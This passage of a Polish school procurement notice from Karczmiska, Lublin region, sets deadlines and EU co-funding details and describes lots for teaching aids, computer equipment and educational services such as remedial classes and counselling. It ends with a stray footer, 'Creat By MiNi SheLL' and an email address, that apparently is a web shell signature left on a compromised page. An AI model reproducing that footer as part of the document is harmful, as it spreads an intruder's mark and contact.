b)w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy.
c)w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zskarczmiska.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W sekretariacie Zespołu Szkół w Karczmiskach, Karczmiska Pierwsze, 
ul. Szkolna 1, 24 - 310 Karczmiska w godzinach 8:00 - 15:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2014 godzina 10:00, miejsce: Sekretariat Zespół Szkół w Karczmiskach, Karczmiska Pierwsze, 
ul. Szkolna 1, 24 - 310 Karczmiska.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Pasja poznania w ramach POKL współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup pomocy dydaktycznych, materiałów i wyposażenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1.Szczegółowy wykaz i opis zamawianych pomocy dydaktycznych , materiałów 
i wyposażenia określa Załącznik Nr 1 do SIWZ.
1.2.Zaoferowane pomoce dydaktyczne muszą spełniać wymagane parametry lub być o parametrach nie gorszych od określonych w Załączniku Nr 1 do SIWZ.
3.1.3.	Zaoferowane pomoce dydaktyczne, materiały i wyposażenie muszą posiadać wymagane dokumenty, certyfikaty, licencje dopuszczające je do użytku 
w szkole, jeśli przepisy tego wymagają. Dokumenty te wykonawca ma obowiązek dostarczyć wraz z pomocami dydaktycznymi, materiałami i wyposażeniem zamawiającemu.
1.4.Zaoferowane pomoce dydaktyczne, materiały i wyposażenie muszą być fabrycznie nowe, nieużywane.
3.1.5.	Zamówienie obejmuje również:
1)dostarczenie zamówienia do wskazanych miejsc dostawy, 
2)montaż dostarczonych pomocy dydaktycznych, materiałów i wyposażenia 
w miejscu wskazanym przez zamawiającego, 
3)udzielenie gwarancji na 12 miesięcy oraz zagwarantowanie na ten czas serwisu gwarancyjnego, gwarancja nie dotyczy materiałów zużywalnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup sprzętu elektronicznego, multimedialnego, komputerowego i oprogramowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1.Szczegółowy wykaz i opis zamawianego sprzętu elektronicznego, multimedialnego, komputerowego i oprogramowania, określa Załącznik Nr 2 i Nr 2a do SIWZ. 
2.2.Zaoferowany sprzęt i oprogramowanie musi spełniać wymagane w opisie parametry lub być o parametrach nie gorszych od określonych w Załączniku Nr 2 i Nr 2a do SIWZ.
2.3.Zaoferowany sprzęt, oprogramowanie musi posiadać wymagane dokumenty, certyfikaty, licencje dopuszczające je do użytku w szkole, jeśli przepisy tego wymagają. Licencje na oprogramowanie, jeśli nie określa ich SIWZ muszą być bezterminowe. Dokumenty te wykonawca ma obowiązek dostarczyć wraz 
ze sprzętem zamawiającemu.
2.4.Wykonawca dołączy do sprzętu i oprogramowania stosowne dokumenty 
i materiały informacyjne, potwierdzające parametry techniczne na podstawie, których zamawiający dokona oceny zgodności z opisem przedmiotu zamówienia (katalogi, opisy opracowane przez producenta w języku polskim).
3.2.5.	Zaoferowany sprzęt musi być fabrycznie nowy, nieużywany.
3.2.6.	Usługa obejmuje również:
1)dostarczenie sprzętu i oprogramowania do wskazanych miejsc dostawy, 
2)montaż, instalację i uruchomienie dostarczonego sprzętu i oprogramowania,
3)szkolenie personelu w zakresie obsługi sprzętu i oprogramowania, 
4)dostarczenie wraz z zamówieniem wymaganej do obsługi instrukcji 
w języku polskim,
5)udzielenie gwarancji na 24 miesiące oraz zagwarantowanie na ten czas serwisu gwarancyjnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 48.90.00.00-8, 31.71.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup usług edukacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.1.Część 3.1.a - Zakup usług edukacyjnych - zajęcia wyrównawcze z j. niemieckiego. Prowadzenie zajęć wyrównawczych z języka niemieckiego dla uczniów kl. III gimnazjum (5 grup): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 180 h.
3.2.Część 3.1.b - Zakup usług edukacyjnych - zajęcia wyrównawcze z j. niemieckiego. Prowadzenie zajęć wyrównawczych z języka niemieckiego dla uczniów kl. III gimnazjum (4 grupy): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 144 h.
3.3.Część 3.2.a - Zakup usług edukacyjnych - zajęcia wyrównawcze z matematyki. Prowadzenie zajęć wyrównawczych z matematyki dla uczniów kl. III gimnazjum 
(5 grup): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 180 h.
3.4.Część 3.2.b - Zakup usług edukacyjnych - zajęcia wyrównawcze z matematyki. Prowadzenie zajęć wyrównawczych z matematyki dla uczniów kl. III gimnazjum
(4 grupy): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 144 h.
3.5.Część 3.3 - Zakup usług edukacyjnych - zajęcia rozwijające z biologii. Prowadzenie zajęć rozwijających z biologii dla uczniów kl. I i II gimnazjum  (2 grupy): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 72 h.  
3.6.Część 3.4.a - Zakup usług edukacyjnych - zajęcia wyrównawcze z j. angielskiego. Prowadzenie zajęć wyrównawczych z języka angielskiego dla uczniów kl. I gimnazjum (3 grupy): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 108 h.
3.3.7.	Część 3.4.b - Zakup usług edukacyjnych - zajęcia wyrównawcze z j. angielskiego. Prowadzenie zajęć wyrównawczych z języka angielskiego dla uczniów kl. II gimnazjum (3 grupy): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 108 h.
3.8.Część 3.4.c - Zakup usług edukacyjnych - zajęcia rozwijające z j. angielskiego. Prowadzenie zajęć rozwijających z języka angielskiego dla uczniów kl. I i II gimnazjum (2 grupy): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 72 h.
3.9.Część 3.5 - Zakup usług edukacyjnych - zajęcia plastyczne. Prowadzenie zajęć plastycznych dla uczniów gimnazjum (2 grupy): średnio 2 godziny w tygodniu dla jednej grup, łącznie 72 h dla 1 grupy, razem 144 h.
3.10.	Część 3.6.a - Zakup usług edukacyjnych - zajęcia dziennikarsko-filmowe. Prowadzenie zajęć dziennikarsko-filmowych dla uczniów gimnazjum (1 grupa): średnio 2 godziny w tygodniu dla jednej grup, łącznie 72 h dla 1 grupy, razem 72 h.
3.11.	Część 3.6.b - Zakup usług edukacyjnych - zajęcia dziennikarsko-filmowe. Prowadzenie zajęć dziennikarsko-filmowych dla uczniów gimnazjum (1 grupa): średnio 2 godziny w tygodniu dla jednej grup, łącznie 72 h dla 1 grupy, razem 72 h.
3.12.	Część 3.7.a - Zakup usług edukacyjnych - doradztwo zawodowe (konsultacje indywidualne). Prowadzenie zajęć z doradztwa zawodowego- konsultacji indywidualnych dla uczniów  kl. II i III gimnazjum  średnio 4 godz. w tygodniu, razem 144 h.
3.13.	Część 3.7.b - Zakup usług edukacyjnych - doradztwo zawodowe. Prowadzenie zajęć z doradztwa zawodowego dla uczniów kl. II gimnazjum (8 grup): średnio 2 godz. w miesiącu dla jednej grupy, łącznie 20 h dla 1 grupy, razem 160 h.
3.14.	Część 3.7.c - Zakup usług edukacyjnych - doradztwo zawodowe. Prowadzenie zajęć z doradztwa zawodowego dla uczniów kl. II gimnazjum (9 grup): średnio 2 godz. w miesiącu dla jednej grupy, łącznie 20 h dla 1 grupy, razem 180 h.
3.15.	Część 3.8 - Zakup usług edukacyjnych - zajęcia logopedyczne. Prowadzenie zajęć logopedycznych dla uczniów gimnazjum (4 grupy): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 144 h.
3.16.	Część 3.9 - Zakup usług edukacyjnych - konsultacje indywidualne z psychologiem. Prowadzenie przez psychologa konsultacji indywidualnych dla uczniów gimnazjum średnio 4 godz. w tygodniu, razem 144 h..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com